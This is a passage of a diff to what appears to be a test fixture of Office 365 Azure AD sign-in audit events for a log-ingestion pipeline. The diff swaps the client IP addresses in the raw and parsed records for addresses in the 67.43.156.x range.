Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"17d02385-1e30-45b7-949c-4d3dd549a0e7\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"361dd87e-3bc9-4f0a-b236-ed7365e28d00\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:51:23\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"17d02385-1e30-45b7-949c-4d3dd549a0e7\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"361dd87e-3bc9-4f0a-b236-ed7365e28d00\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2669,10 +2669,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:51:23", "ExtendedProperties": [ { @@ -2722,7 +2722,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:39:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e3346dd0-ecf6-4676-8765-365c7370b6fe\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"32b4cec1-00eb-44ea-be73-adc82387db00\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:39:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e3346dd0-ecf6-4676-8765-365c7370b6fe\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"32b4cec1-00eb-44ea-be73-adc82387db00\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2732,10 +2732,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T21:39:45", "ExtendedProperties": [ { @@ -2778,7 +2778,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:40:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"a772fd76-847f-4703-90f1-37eb81c9f392\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"a063e495-5883-4837-8186-582817fdd500\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:40:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"a772fd76-847f-4703-90f1-37eb81c9f392\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"a063e495-5883-4837-8186-582817fdd500\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2796,10 +2796,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T21:40:16", "ExtendedProperties": [ { @@ -2850,7 +2850,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"37.29.234.179\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"37.29.234.179\",\"CreationTime\":\"2020-02-08T14:33:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"487e4f43-53db-4d6f-a314-5355746d4853\",\"InterSystemsId\":\"7766ac63-ae7f-43e6-868a-a5422a96fd8b\",\"IntraSystemId\":\"adc9d69c-8ae6-41c7-b685-331453060a00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.14\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.14\",\"CreationTime\":\"2020-02-08T14:33:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"487e4f43-53db-4d6f-a314-5355746d4853\",\"InterSystemsId\":\"7766ac63-ae7f-43e6-868a-a5422a96fd8b\",\"IntraSystemId\":\"adc9d69c-8ae6-41c7-b685-331453060a00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2868,10 +2868,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "37.29.234.179", + "ActorIpAddress": "67.43.156.14", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "37.29.234.179", + "ClientIP": "67.43.156.14", "CreationTime": "2020-02-08T14:33:52", "ExtendedProperties": [ { @@ -2921,7 +2921,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:53:24\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"41f6b2dc-4db6-444c-93d9-829a842b87e2\",\"InterSystemsId\":\"781c1055-e731-48ee-a806-c3f39ba160e3\",\"IntraSystemId\":\"e7fe21ea-ec03-46dd-b272-0a72ebbeac00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:53:24\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"41f6b2dc-4db6-444c-93d9-829a842b87e2\",\"InterSystemsId\":\"781c1055-e731-48ee-a806-c3f39ba160e3\",\"IntraSystemId\":\"e7fe21ea-ec03-46dd-b272-0a72ebbeac00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2939,10 +2939,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T10:53:24", "ExtendedProperties": [ { @@ -2992,7 +2992,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"ec9fa29b-6201-456d-b228-ca1759e0bf6c\",\"InterSystemsId\":\"82b07417-7b33-4531-952f-d3f719e2356a\",\"IntraSystemId\":\"280b3410-9d51-4ce3-952d-5bba0bea6600\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"ec9fa29b-6201-456d-b228-ca1759e0bf6c\",\"InterSystemsId\":\"82b07417-7b33-4531-952f-d3f719e2356a\",\"IntraSystemId\":\"280b3410-9d51-4ce3-952d-5bba0bea6600\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3010,10 +3010,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:43:22", "ExtendedProperties": [ { @@ -3063,7 +3063,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-06T09:28:04\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e988fd90-2eff-4ad7-9f02-030a9d73ad6e\",\"InterSystemsId\":\"8571fe85-eb4a-430d-b468-97900e344923\",\"IntraSystemId\":\"d239e473-6687-4ff9-ac65-0e3c59961600\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-06T09:28:04\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e988fd90-2eff-4ad7-9f02-030a9d73ad6e\",\"InterSystemsId\":\"8571fe85-eb4a-430d-b468-97900e344923\",\"IntraSystemId\":\"d239e473-6687-4ff9-ac65-0e3c59961600\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3073,10 +3073,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-06T09:28:04", "ExtendedProperties": [ { @@ -3119,7 +3119,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:35\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 